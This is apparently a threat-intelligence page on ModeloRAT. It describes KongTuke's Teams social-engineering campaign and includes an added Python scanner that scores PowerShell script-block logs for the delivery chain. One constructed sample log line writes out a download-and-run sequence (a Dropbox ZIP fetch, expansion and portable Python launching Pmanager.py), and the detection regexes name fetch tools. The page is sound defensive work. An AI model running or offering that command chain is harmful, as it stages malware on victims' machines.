
ModeloRAT malicious PowerShell and Dropbox delivery activity

Malware Activity
Happening score: 16
1 unique source, 1 article

Summary


The ModeloRAT activity now uses a malicious PowerShell command and a Dropbox ZIP payload to gain persistent footholds, enabling system reconnaissance, screenshot capture, and file exfiltration on compromised hosts. The chain matters because it turns a short social-engineering interaction into remote control and data theft capability. The latest build also strengthens persistence and C2 resilience.

Related Happenings

KongTuke Microsoft Teams initial access campaign

Campaign
First: 14.05.2026 15:12 Last: 14.05.2026 15:12 Sources 1

How related: The campaign has been active since at least April 2026, with KongTuke rotating through five Microsoft 365 tenants to evade blocking, the researchers say.

About this happening: The **KongTuke** campaign now uses **Microsoft Teams** social engineering to gain persistent access to **corporate networks**, shortening initial compromise to **under five minute...

ClickFix attacks with PySoxy scheduled-task persistence

Malware Activity
First: 12.05.2026 15:00 Last: 12.05.2026 15:00 Sources 1

About this happening: Cybercriminals are combining **ClickFix** with **PySoxy** to preserve access on victim machines, letting activity restart even after removal attempts. The setup uses a **Python SO...

DEEP#DOOR Python backdoor framework

Malware Activity
First: 30.04.2026 15:36 Last: 30.04.2026 15:36 Sources 1

About this happening: **DEEP#DOOR** is a newly disclosed **Python-based backdoor framework** that can keep **persistent access** to compromised Windows hosts while stealing browser, SSH, and cloud cred...

GlassWorm v2 cloned VS Code extension loaders

Malware Activity
First: 27.04.2026 14:23 Last: 27.04.2026 14:23 Sources 1

About this happening: The **GlassWorm v2** malware activity now uses **cloned VS Code extensions** on **Open VSX** to deliver payloads that steal credentials, deploy a **RAT**, and spread across multip...

Snow malware suite deployment by UNC6692

Malware Activity
First: 25.04.2026 18:07 Last: 25.04.2026 18:07 Sources 1

About this happening: UNC6692 has deployed the **Snow** malware suite through **social engineering**, creating a stealthy path to **credential theft** and **domain compromise**. The operation uses **em...

Timeline

  1. 14.05.2026 15:12 2 articles · 13d ago

    KongTuke Teams delivery of ModeloRAT

    Initial Disclosure

    KongTuke shifts to Microsoft Teams social engineering against corporate users, persuading victims to run a malicious PowerShell command that downloads a Dropbox ZIP archive, launches a portable WinPython environment and Pmanager.py, and deploys ModeloRAT for system reconnaissance, screenshot capture, file exfiltration, and persistent access.

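The delivery chain in the timeline entry (a PowerShell command fetches a ZIP from Dropbox, expands it, and launches a portable WinPython interpreter on Pmanager.py) is a sequence defenders can score for in PowerShell script-block logs. The following is an added example written for this page, not code from the original source or from the researchers it cites: a small Python scanner that parses constructed log lines in a made-up `host=... event=... script=...` format, scores each script block against indicators of that chain, and raises a finding when enough of them co-occur. The host names, log format, sample commands and Dropbox URL are constructed for illustration; the indicator list is an assumption about what such a chain looks like, not a vendor signature.

```python
"""Added example, not from the original page: score PowerShell script-block
log entries for the chain described in the timeline entry (cloud ZIP download,
archive expansion, portable Python interpreter launched on a .py payload).
Log format, host names and sample commands are constructed for illustration."""
import re
from dataclasses import dataclass

# Indicator regexes, matched case-insensitively. Each one alone is common in
# legitimate admin activity; the combination is what makes the chain stand out.
INDICATORS = {
    "dropbox_download": re.compile(r"dropbox(?:usercontent)?\.com/", re.I),
    "web_fetch": re.compile(
        r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
        r"DownloadFile|DownloadString)\b", re.I),
    "archive_expand": re.compile(r"\b(?:Expand-Archive|ExtractToDirectory)\b", re.I),
    "portable_python": re.compile(r"(?:WinPython|pythonw?\.exe)", re.I),
    "py_script": re.compile(r"\b[\w-]+\.py\b", re.I),
    "user_writable_path": re.compile(
        r"(?:\\(?:AppData|Temp|Public|ProgramData|Downloads)\\|"
        r"\$env:(?:TEMP|TMP|APPDATA|LOCALAPPDATA|PUBLIC))", re.I),
}
ALERT_THRESHOLD = 5  # assumed cut-off; tune against your own baseline

# Constructed sample log lines (event 4104 = PowerShell script-block logging).
SAMPLE_LOGS = [
    'host=WS-042 event=4104 script=iwr https://www.dropbox.com/s/EXAMPLE/pkg.zip '
    '-OutFile $env:TEMP\\pkg.zip; Expand-Archive $env:TEMP\\pkg.zip $env:APPDATA\\WinPython; '
    '& $env:APPDATA\\WinPython\\python.exe $env:APPDATA\\WinPython\\Pmanager.py',
    'host=WS-017 event=4104 script=Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object',
    'host=WS-023 event=4104 script=Invoke-WebRequest https://updates.example.internal/agent.msi '
    '-OutFile C:\\ProgramData\\agent.msi',
]

LINE_RX = re.compile(r"host=(\S+)\s+event=(\d+)\s+script=(.*)$")


@dataclass
class Finding:
    host: str
    hits: list
    score: int


def score_script_block(script: str):
    """Return (matched indicator names, score) for one script block."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    score = len(hits)
    # The full chain (cloud download + portable Python + a .py payload) gets a bonus,
    # so it clears the threshold even when the other indicators are obfuscated away.
    if {"dropbox_download", "portable_python", "py_script"} <= set(hits):
        score += 3
    return hits, score


def parse_line(line: str):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LINE_RX.match(line)
    if not m:
        return None
    return {"host": m.group(1), "event": int(m.group(2)), "script": m.group(3)}


def scan(lines, threshold=ALERT_THRESHOLD):
    """Return a Finding for every script-block entry scoring at or above threshold."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["event"] != 4104:
            continue
        hits, score = score_script_block(rec["script"])
        if score >= threshold:
            findings.append(Finding(rec["host"], hits, score))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.host}: score={f.score} indicators={', '.join(f.hits)}")
```

Run against the constructed sample, only the WS-042 block is reported: it matches all six indicators and the chain bonus, while the benign directory listing scores zero and the internal MSI download scores two (a fetch plus a ProgramData path), well under the threshold. The point of the additive score rather than a single regex is that a download from a file-sharing site or a Python interpreter in a user-writable path is each unremarkable on its own; the chain is the signal.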